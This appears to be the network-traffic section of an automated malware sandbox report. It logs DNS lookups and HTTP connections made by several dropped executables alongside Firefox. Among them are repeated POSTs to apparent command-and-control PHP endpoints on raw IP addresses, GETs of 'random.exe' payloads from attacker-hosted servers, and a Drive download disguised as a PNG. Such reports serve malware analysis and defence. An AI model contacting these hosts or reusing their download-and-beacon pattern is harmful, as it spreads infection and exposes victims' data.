                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                      Cross-Origin-Opener-Policy: same-origin
                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                      Server: ESF
                      Content-Length: 0
                      X-XSS-Protection: 0
                      X-Frame-Options: SAMEORIGIN
                      X-Content-Type-Options: nosniff
                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                    • flag-us
                      DNS
                      c.pki.goog
                      df1fc80896.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      c.pki.goog
                      IN A
                      Response
                      c.pki.goog
                      IN CNAME
                      pki-goog.l.google.com
                      pki-goog.l.google.com
                      IN A
                      142.250.179.67
                    • flag-fr
                      GET
                      http://c.pki.goog/r/r1.crl
                      df1fc80896.exe
                      Remote address:
                      142.250.179.67:80
                      Request
                      GET /r/r1.crl HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Microsoft-CryptoAPI/6.1
                      Host: c.pki.goog
                      Response
                      HTTP/1.1 200 OK
                      Accept-Ranges: bytes
                      Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
                      Cross-Origin-Resource-Policy: cross-origin
                      Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
                      Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
                      Content-Length: 854
                      X-Content-Type-Options: nosniff
                      Server: sffe
                      X-XSS-Protection: 0
                      Date: Sun, 22 Dec 2024 02:07:54 GMT
                      Expires: Sun, 22 Dec 2024 02:57:54 GMT
                      Cache-Control: public, max-age=3000
                      Age: 1411
                      Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT
                      Content-Type: application/pkix-crl
                      Vary: Accept-Encoding
                    • flag-us
                      DNS
                      o.pki.goog
                      df1fc80896.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      o.pki.goog
                      IN A
                      Response
                      o.pki.goog
                      IN CNAME
                      pki-goog.l.google.com
                      pki-goog.l.google.com
                      IN A
                      142.250.179.67
                    • flag-fr
                      GET
                      http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQD8Elu9WzbqaxI7ClVJiEyf
                      df1fc80896.exe
                      Remote address:
                      142.250.179.67:80
                      Request
                      GET /wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQD8Elu9WzbqaxI7ClVJiEyf HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Microsoft-CryptoAPI/6.1
                      Host: o.pki.goog
                      Response
                      HTTP/1.1 200 OK
                      Server: ocsp_responder
                      Content-Length: 472
                      X-XSS-Protection: 0
                      X-Frame-Options: SAMEORIGIN
                      Date: Sun, 22 Dec 2024 02:28:22 GMT
                      Cache-Control: public, max-age=14400
                      Content-Type: application/ocsp-response
                      Age: 183
                    • flag-fr
                      GET
                      http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDkqhDvrMuENxBpWocUnIUC
                      df1fc80896.exe
                      Remote address:
                      142.250.179.67:80
                      Request
                      GET /wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDkqhDvrMuENxBpWocUnIUC HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Microsoft-CryptoAPI/6.1
                      Host: o.pki.goog
                      Response
                      HTTP/1.1 200 OK
                      Server: ocsp_responder
                      Content-Length: 472
                      X-XSS-Protection: 0
                      X-Frame-Options: SAMEORIGIN
                      Date: Sun, 22 Dec 2024 02:23:57 GMT
                      Cache-Control: public, max-age=14400
                      Content-Type: application/ocsp-response
                      Age: 449
                    • flag-us
                      DNS
                      drive.usercontent.google.com
                      df1fc80896.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      drive.usercontent.google.com
                      IN A
                      Response
                      drive.usercontent.google.com
                      IN A
                      142.250.74.225
                    • flag-fr
                      GET
                      https://drive.usercontent.google.com/download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download
                      df1fc80896.exe
                      Remote address:
                      142.250.74.225:443
                      Request
                      GET /download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download HTTP/1.1
                      User-Agent: FileDownloader
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Host: drive.usercontent.google.com
                      Response
                      HTTP/1.1 200 OK
                      X-GUploader-UploadID: AFiumC6EQLRFuwCdAT682YaxWqXZslL1tBZ7pR4Zey4F01p8il2IWfFoFUEIqz7Jfi1JJdwi
                      Content-Type: image/png
                      Content-Security-Policy: sandbox
                      Content-Security-Policy: default-src 'none'
                      Content-Security-Policy: frame-ancestors 'none'
                      X-Content-Security-Policy: sandbox
                      Cross-Origin-Opener-Policy: same-origin
                      Cross-Origin-Embedder-Policy: require-corp
                      Cross-Origin-Resource-Policy: same-site
                      X-Content-Type-Options: nosniff
                      Content-Disposition: attachment; filename="output.png"
                      Access-Control-Allow-Origin: *
                      Access-Control-Allow-Credentials: false
                      Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, X-Google-EOM, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-353267353-bin, x-goog-ext-353267353-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, x-goog-ext-202735639-bin, x-goog-ext-223435598-bin, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Places-Ios-Sdk, X-Android-Package, X-Android-Cert, X-Places-Android-Sdk, X-Goog-Maps-Ios-Uuid, X-Goog-Maps-Android-Uuid, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-Bot-Info, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context, x-goog-nest-jwt, X-Cloud-Trace-Context, traceparent, x-goog-chat-space-id, x-goog-pan-request-context, X-AppInt-Credentials
                      Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                      Accept-Ranges: bytes
                      Content-Length: 156917
                      Last-Modified: Mon, 11 Nov 2024 02:30:33 GMT
                      Date: Sun, 22 Dec 2024 02:31:29 GMT
                      Expires: Sun, 22 Dec 2024 02:31:29 GMT
                      Cache-Control: private, max-age=0
                      X-Goog-Hash: crc32c=h6mvlQ==
                      Server: UploadServer
                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                    • 185.215.113.43:80
                      http://185.215.113.43/Zu7JuNko/index.php
                      http
                      skotes.exe
                      4.7kB
                      5.7kB
                      36
                      26

                      HTTP Request

                      POST http://185.215.113.43/Zu7JuNko/index.php

                      HTTP Response

                      200

                      HTTP Request

                      POST http://185.215.113.43/Zu7JuNko/index.php

                      HTTP Response

                      200

                      HTTP Request

                      POST http://185.215.113.43/Zu7JuNko/index.php

                      HTTP Response

                      200

                      HTTP Request

                      POST http://185.215.113.43/Zu7JuNko/index.php

                      HTTP Response

                      200

                      HTTP Request

                      POST http://185.215.113.43/Zu7JuNko/index.php

                      HTTP Response

                      200

                      HTTP Request

                      POST http://185.215.113.43/Zu7JuNko/index.php

                      HTTP Response

                      200

                      HTTP Request

                      POST http://185.215.113.43/Zu7JuNko/index.php

                      HTTP Response

                      200

                      HTTP Request

                      POST http://185.215.113.43/Zu7JuNko/index.php

                      HTTP Response

                      200

                      HTTP Request

                      POST http://185.215.113.43/Zu7JuNko/index.php

                      HTTP Response

                      200

                      HTTP Request

                      POST http://185.215.113.43/Zu7JuNko/index.php

                      HTTP Response

                      200
                    • 185.215.113.16:80
                      http://185.215.113.16/luma/random.exe
                      http
                      skotes.exe
                      53.1kB
                      1.9MB
                      1025
                      1351

                      HTTP Request

                      GET http://185.215.113.16/luma/random.exe

                      HTTP Response

                      200
                    • 185.215.113.16:80
                      http://185.215.113.16/off/random.exe
                      http
                      skotes.exe
                      98.2kB
                      7.0MB
                      2112
                      5015

                      HTTP Request

                      GET http://185.215.113.16/steam/random.exe

                      HTTP Response

                      200

                      HTTP Request

                      GET http://185.215.113.16/well/random.exe

                      HTTP Response

                      200

                      HTTP Request

                      GET http://185.215.113.16/off/random.exe

                      HTTP Response

                      200
                    • 185.215.113.206:80
                      http://185.215.113.206/c4becf79229cb002.php
                      http
                      ac7623e0c4.exe
                      871 B
                      1.1kB
                      8
                      7

                      HTTP Request

                      GET http://185.215.113.206/

                      HTTP Response

                      200

                      HTTP Request

                      POST http://185.215.113.206/c4becf79229cb002.php

                      HTTP Response

                      200
                    • 127.0.0.1:49290
                      firefox.exe
                    • 127.0.0.1:49298
                      firefox.exe
                    • 34.120.5.221:443
                      https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=40249-e88c401e1b1f2242d9e441c4&locale_lang=en-US&region=GB&count=30
                      tls, http2
                      firefox.exe
                      3.7kB
                      14.0kB
                      25
                      23

                      HTTP Request

                      GET https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=40249-e88c401e1b1f2242d9e441c4&locale_lang=en-US&region=GB&count=30
                    • 172.217.18.206:443
                      https://www.youtube.com/account?=https%3A%2F%2Faccounts.google.com%2Fv3%2Fsignin%2Fchallenge%2Fpwd
                      tls, http2
                      firefox.exe
                      3.7kB
                      10.7kB
                      25
                      21

                      HTTP Request

                      GET https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd

                      HTTP Request

                      GET https://www.youtube.com/account?=https%3A%2F%2Faccounts.google.com%2Fv3%2Fsignin%2Fchallenge%2Fpwd
                    • 142.250.179.110:443
                      www.youtube.com
                      tls, http2
                      firefox.exe
                      1.9kB
                      8.2kB
                      14
                      11
                    • 142.250.179.110:443
                      www.youtube.com
                      tls, http2
                      firefox.exe
                      3.4kB
                      9.2kB
                      22
                      14
                    • 142.250.179.110:443
                      consent.youtube.com
                      firefox.exe
                      52 B
                      1
                    • 142.250.179.110:443
                      https://consent.youtube.com/m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1
                      tls, http2
                      firefox.exe
                      3.2kB
                      64.6kB
                      36
                      53

                      HTTP Request

                      GET https://consent.youtube.com/m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1
                    • 172.217.20.164:443
                      www.google.com
                      tls
                      firefox.exe
                      2.1kB
                      340 B
                      12
                      7
                    • 172.217.20.164:443
                      www.google.com
                      tls, http2
                      firefox.exe
                      1.4kB
                      5.3kB
                      12
                      12
                    • 88.221.134.155:80
                      ciscobinary.openh264.org
                      firefox.exe
                      294 B
                      144 B
                      6
                      3
                    • 88.221.134.155:80
                      http://ciscobinary.openh264.org/openh264-win64-2e1774ab6dc6c43debb0b5b628bdf122a391d521.zip
                      http
                      firefox.exe
                      6.8kB
                      467.5kB
                      135
                      344

                      HTTP Request

                      GET http://ciscobinary.openh264.org/openh264-win64-2e1774ab6dc6c43debb0b5b628bdf122a391d521.zip

                      HTTP Response

                      200
                    • 172.217.20.174:443
                      redirector.gvt1.com
                      tls
                      firefox.exe
                      2.1kB
                      9.0kB
                      19
                      22
                    • 74.125.175.169:443
                      r4---sn-aigzrnsz.gvt1.com
                      tls
                      firefox.exe
                      143.3kB
                      8.7MB
                      2763
                      6244
                    • 34.117.121.53:443
                      firefox-settings-attachments.cdn.mozilla.net
                      tls
                      firefox.exe
                      1.5kB
                      21.0kB
                      13
                      22
                    • 31.41.244.11:80
                      http://31.41.244.11/files/martin/random.exe
                      http
                      skotes.exe
                      162.4kB
                      12.3MB
                      3419
                      12775

                      HTTP Request

                      GET http://31.41.244.11/files/burpin1/random.exe

                      HTTP Response

                      200

                      HTTP Request

                      GET http://31.41.244.11/files/geopoxid/random.exe

                      HTTP Response

                      200

                      HTTP Request

                      GET http://31.41.244.11/files/zhigarko/random.exe

                      HTTP Response

                      200

                      HTTP Request

                      GET http://31.41.244.11/files/kardanvalov88/random.exe

                      HTTP Response

                      200

                      HTTP Request

                      GET http://31.41.244.11/files/martin/random.exe

                      HTTP Response

                      200
                    • 216.58.214.174:443
                      https://play.google.com/log?hasfast=true&authuser=0&format=json
                      tls, http2
                      firefox.exe
                      2.7kB
                      8.5kB
                      16
                      18

                      HTTP Request

                      POST https://play.google.com/log?hasfast=true&authuser=0&format=json
                    • 172.67.177.88:443
                      https://cheapptaxysu.click/api
                      tls, http
                      ef0449806c.exe
                      1.6kB
                      10.1kB
                      12
                      18

                      HTTP Request

                      POST https://cheapptaxysu.click/api

                      HTTP Response

                      403

                      HTTP Request

                      POST https://cheapptaxysu.click/api

                      HTTP Response

                      200
                    • 212.193.31.8:80
                      http://212.193.31.8/3ofn3jf3e2ljk2/index.php
                      http
                      Gxtuum.exe
                      790 B
                      521 B
                      7
                      5

                      HTTP Request

                      POST http://212.193.31.8/3ofn3jf3e2ljk2/index.php

                      HTTP Response

                      200

                      HTTP Request

                      POST http://212.193.31.8/3ofn3jf3e2ljk2/index.php

                      HTTP Response

                      200
                    • 142.250.75.238:443
                      https://drive.google.com/uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download
                      tls, http
                      df1fc80896.exe
                      926 B
                      8.3kB
                      10
                      10

                      HTTP Request

                      GET https://drive.google.com/uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download

                      HTTP Response

                      303
                    • 142.250.179.67:80
                      http://c.pki.goog/r/r1.crl
                      http
                      df1fc80896.exe
                      302 B
                      1.7kB
                      4
                      4

                      HTTP Request

                      GET http://c.pki.goog/r/r1.crl

                      HTTP Response

                      200
                    • 142.250.179.67:80
                      http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDkqhDvrMuENxBpWocUnIUC
                      http
                      df1fc80896.exe
                      838 B
                      3.1kB
                      8
                      6

                      HTTP Request

                      GET http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQD8Elu9WzbqaxI7ClVJiEyf

                      HTTP Response

                      200

                      HTTP Request

                      GET http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDkqhDvrMuENxBpWocUnIUC

                      HTTP Response

                      200
                    • 142.250.74.225:443
                      https://drive.usercontent.google.com/download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download
                      tls, http
                      df1fc80896.exe
                      2.9kB
                      139.7kB
                      52
                      105

                      HTTP Request

                      GET https://drive.usercontent.google.com/download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download

                      HTTP Response

                      200
                    • 34.117.59.81:443
                      df1fc80896.exe
                    • 8.8.8.8:53
                      spocs.getpocket.com
                      dns
                      firefox.exe
                      65 B
                      131 B
                      1
                      1

                      DNS Request

                      spocs.getpocket.com

                      DNS Response

                      34.117.188.166

                    • 8.8.8.8:53
                      getpocket.cdn.mozilla.net
                      dns
                      firefox.exe
                      71 B
                      174 B
                      1
                      1

                      DNS Request

                      getpocket.cdn.mozilla.net

                      DNS Response

                      34.120.5.221

                    • 8.8.8.8:53
                      youtube.com
                      dns
                      firefox.exe
                      57 B
                      73 B
                      1
                      1

                      DNS Request

                      youtube.com

                      DNS Response

                      172.217.18.206

                    • 8.8.8.8:53
                      prod.ads.prod.webservices.mozgcp.net
                      dns
                      firefox.exe
                      82 B
                      98 B
                      1
                      1

                      DNS Request

                      prod.ads.prod.webservices.mozgcp.net

                      DNS Response

                      34.117.188.166

                    • 8.8.8.8:53
                      prod.pocket.prod.cloudops.mozgcp.net
                      dns
                      firefox.exe
                      82 B
                      98 B
                      1
                      1

                      DNS Request

                      prod.pocket.prod.cloudops.mozgcp.net

                      DNS Response

                      34.120.5.221

                    • 8.8.8.8:53
                      youtube.com
                      dns
                      firefox.exe
                      57 B
                      73 B
                      1
                      1

                      DNS Request

                      youtube.com

                      DNS Response

                      172.217.18.206

                    • 8.8.8.8:53
                      prod.ads.prod.webservices.mozgcp.net
                      dns
                      firefox.exe
                      82 B
                      175 B
                      1
                      1

                      DNS Request

                      prod.ads.prod.webservices.mozgcp.net

                    • 8.8.8.8:53
                      prod.pocket.prod.cloudops.mozgcp.net
                      dns
                      firefox.exe
                      164 B
                      110 B
                      2
                      1

                      DNS Request

                      prod.pocket.prod.cloudops.mozgcp.net

                      DNS Request

                      prod.pocket.prod.cloudops.mozgcp.net

                      DNS Response

                      2600:1901:0:524c::

                    • 8.8.8.8:53
                      youtube.com
                      dns
                      firefox.exe
                      114 B
                      85 B
                      2
                      1

                      DNS Request

                      youtube.com

                      DNS Request

                      youtube.com

                      DNS Response

                      2a00:1450:4007:805::200e

                    • 172.217.18.206:443
                      youtube.com
                      https
                      firefox.exe
                      10.3kB
                      10.7kB
                      15
                      11
                    • 8.8.8.8:53
                      www.youtube.com
                      dns
                      firefox.exe
                      61 B
                      271 B
                      1
                      1

                      DNS Request

                      www.youtube.com

                      DNS Response

                      142.250.179.110
                      172.217.18.206
                      172.217.20.206
                      216.58.215.46
                      216.58.214.174
                      142.250.179.78
                      142.250.178.142
                      172.217.20.174
                      142.250.75.238
                      142.250.201.174
                      216.58.214.78

                    • 8.8.8.8:53
                      shavar.prod.mozaws.net
                      dns
                      firefox.exe
                      136 B
                      116 B
                      2
                      1

                      DNS Request

                      shavar.prod.mozaws.net

                      DNS Request

                      shavar.prod.mozaws.net

                      DNS Response

                      44.228.225.150
                      44.240.87.158
                      52.40.120.141

                    • 8.8.8.8:53
                      prod.remote-settings.prod.webservices.mozgcp.net
                      dns
                      firefox.exe
                      94 B
                      110 B
                      1
                      1

                      DNS Request

                      prod.remote-settings.prod.webservices.mozgcp.net

                      DNS Response

                      34.149.100.209

                    • 8.8.8.8:53
                      prod.remote-settings.prod.webservices.mozgcp.net
                      dns
                      firefox.exe
                      188 B
                      187 B
                      2
                      1

                      DNS Request

                      prod.remote-settings.prod.webservices.mozgcp.net

                      DNS Request

                      prod.remote-settings.prod.webservices.mozgcp.net

                    • 8.8.8.8:53
                      shavar.prod.mozaws.net
                      dns
                      firefox.exe
                      68 B
                      153 B
                      1
                      1

                      DNS Request

                      shavar.prod.mozaws.net

                    • 8.8.8.8:53
                      youtube-ui.l.google.com
                      dns
                      firefox.exe
                      276 B
                      245 B
                      4
                      1

                      DNS Request

                      youtube-ui.l.google.com

                      DNS Request

                      youtube-ui.l.google.com

                      DNS Request

                      youtube-ui.l.google.com

                      DNS Request

                      youtube-ui.l.google.com

                      DNS Response

                      142.250.178.142
                      142.250.179.78
                      216.58.214.78
                      216.58.215.46
                      142.250.75.238
                      172.217.20.206
                      216.58.214.174
                      142.250.201.174
                      142.250.179.110
                      172.217.20.174
                      172.217.18.206

                    • 8.8.8.8:53
                      prod.content-signature-chains.prod.webservices.mozgcp.net
                      dns
                      firefox.exe
                      103 B
                      119 B
                      1
                      1

                      DNS Request

                      prod.content-signature-chains.prod.webservices.mozgcp.net

                      DNS Response

                      34.160.144.191

                    • 8.8.8.8:53
                      prod.content-signature-chains.prod.webservices.mozgcp.net
                      dns
                      firefox.exe
                      206 B
                      131 B
                      2
                      1

                      DNS Request

                      prod.content-signature-chains.prod.webservices.mozgcp.net

                      DNS Request

                      prod.content-signature-chains.prod.webservices.mozgcp.net

                      DNS Response

                      2600:1901:0:92a9::

                    • 8.8.8.8:53
                      youtube-ui.l.google.com
                      dns
                      firefox.exe
                      69 B
                      181 B
                      1
                      1

                      DNS Request

                      youtube-ui.l.google.com

                      DNS Response

                      2a00:1450:4007:808::200e
                      2a00:1450:4007:80e::200e
                      2a00:1450:4007:810::200e
                      2a00:1450:4007:80c::200e

                    • 8.8.8.8:53
                      consent.youtube.com
                      dns
                      firefox.exe
                      130 B
                      81 B
                      2
                      1

                      DNS Request

                      consent.youtube.com

                      DNS Request

                      consent.youtube.com

                      DNS Response

                      142.250.179.110

                    • 142.250.179.110:443
                      consent.youtube.com
                      https
                      firefox.exe
                      3.5kB
                      9.3kB
                      10
                      10
                    • 8.8.8.8:53
                      consent.youtube.com
                      dns
                      firefox.exe
                      195 B
                      81 B
                      3
                      1

                      DNS Request

                      consent.youtube.com

                      DNS Request

                      consent.youtube.com

                      DNS Request

                      consent.youtube.com

                      DNS Response

                      142.250.179.110

                    • 142.250.179.110:443
                      consent.youtube.com
                      https
                      firefox.exe
                      4.6kB
                      12.0kB
                      17
                      17
                    • 8.8.8.8:53
                      www.google.com
                      dns
                      firefox.exe
                      60 B
                      76 B
                      1
                      1

                      DNS Request

                      www.google.com

                      DNS Response

                      172.217.20.164

                    • 8.8.8.8:53
                      www.google.com
                      dns
                      firefox.exe
                      120 B
                      76 B
                      2
                      1

                      DNS Request

                      www.google.com

                      DNS Request

                      www.google.com

                      DNS Response

                      172.217.20.164

                    • 8.8.8.8:53
                      www.google.com
                      dns
                      firefox.exe
                      60 B
                      88 B
                      1
                      1

                      DNS Request

                      www.google.com

                      DNS Response

                      2a00:1450:4007:80c::2004

                    • 8.8.8.8:53
                      consent.youtube.com
                      dns
                      firefox.exe
                      195 B
                      93 B
                      3
                      1

                      DNS Request

                      consent.youtube.com

                      DNS Request

                      consent.youtube.com

                      DNS Request

                      consent.youtube.com

                      DNS Response

                      2a00:1450:4007:818::200e

                    • 8.8.8.8:53
                      prod.balrog.prod.cloudops.mozgcp.net
                      dns
                      firefox.exe
                      82 B
                      98 B
                      1
                      1

                      DNS Request

                      prod.balrog.prod.cloudops.mozgcp.net

                      DNS Response

                      35.244.181.201

                    • 8.8.8.8:53
                      prod.balrog.prod.cloudops.mozgcp.net
                      dns
                      firefox.exe
                      164 B
                      175 B
                      2
                      1

                      DNS Request

                      prod.balrog.prod.cloudops.mozgcp.net

                      DNS Request

                      prod.balrog.prod.cloudops.mozgcp.net

                    • 8.8.8.8:53
                      ciscobinary.openh264.org
                      dns
                      firefox.exe
                      70 B
                      286 B
                      1
                      1

                      DNS Request

                      ciscobinary.openh264.org

                      DNS Response

                      88.221.134.155
                      88.221.134.209

                    • 8.8.8.8:53
                      a19.dscg10.akamai.net
                      dns
                      firefox.exe
                      134 B
                      99 B
                      2
                      1

                      DNS Request

                      a19.dscg10.akamai.net

                      DNS Request

                      a19.dscg10.akamai.net

                      DNS Response

                      88.221.134.155
                      88.221.134.209

                    • 8.8.8.8:53
                      a19.dscg10.akamai.net
                      dns
                      firefox.exe
                      67 B
                      123 B
                      1
                      1

                      DNS Request

                      a19.dscg10.akamai.net

                      DNS Response

                      2a02:26f0:a1::58dd:869b
                      2a02:26f0:a1::58dd:86d1

                    • 8.8.8.8:53
                      redirector.gvt1.com
                      dns
                      firefox.exe
                      65 B
                      81 B
                      1
                      1

                      DNS Request

                      redirector.gvt1.com

                      DNS Response

                      172.217.20.174

                    • 8.8.8.8:53
                      redirector.gvt1.com
                      dns
                      firefox.exe
                      130 B
                      81 B
                      2
                      1

                      DNS Request

                      redirector.gvt1.com

                      DNS Request

                      redirector.gvt1.com

                      DNS Response

                      172.217.20.174

                    • 8.8.8.8:53
                      redirector.gvt1.com
                      dns
                      firefox.exe
                      65 B
                      93 B
                      1
                      1

                      DNS Request

                      redirector.gvt1.com

                      DNS Response

                      2a00:1450:4007:80c::200e

                    • 172.217.20.174:443
                      redirector.gvt1.com
                      https
                      firefox.exe
                      3.3kB
                      9.3kB
                      8
                      10
                    • 8.8.8.8:53
                      r4---sn-aigzrnsz.gvt1.com
                      dns
                      firefox.exe
                      71 B
                      116 B
                      1
                      1

                      DNS Request

                      r4---sn-aigzrnsz.gvt1.com

                      DNS Response

                      74.125.175.169

                    • 8.8.8.8:53
                      r4.sn-aigzrnsz.gvt1.com
                      dns
                      firefox.exe
                      69 B
                      85 B
                      1
                      1

                      DNS Request

                      r4.sn-aigzrnsz.gvt1.com

                      DNS Response

                      74.125.175.169

                    • 8.8.8.8:53
                      r4.sn-aigzrnsz.gvt1.com
                      dns
                      firefox.exe
                      69 B
                      97 B
                      1
                      1

                      DNS Request

                      r4.sn-aigzrnsz.gvt1.com

                      DNS Response

                      2a00:1450:4009:1b::9

                    • 74.125.175.169:443
                      r4.sn-aigzrnsz.gvt1.com
                      https
                      firefox.exe
                      2.5kB
                      5.9kB
                      13
                      8
                    • 8.8.8.8:53
                      firefox-settings-attachments.cdn.mozilla.net
                      dns
                      firefox.exe
                      90 B
                      177 B
                      1
                      1

                      DNS Request

                      firefox-settings-attachments.cdn.mozilla.net

                      DNS Response

                      34.117.121.53

                    • 8.8.8.8:53
                      attachments.prod.remote-settings.prod.webservices.mozgcp.net
                      dns
                      firefox.exe
                      106 B
                      122 B
                      1
                      1

                      DNS Request

                      attachments.prod.remote-settings.prod.webservices.mozgcp.net

                      DNS Response

                      34.117.121.53
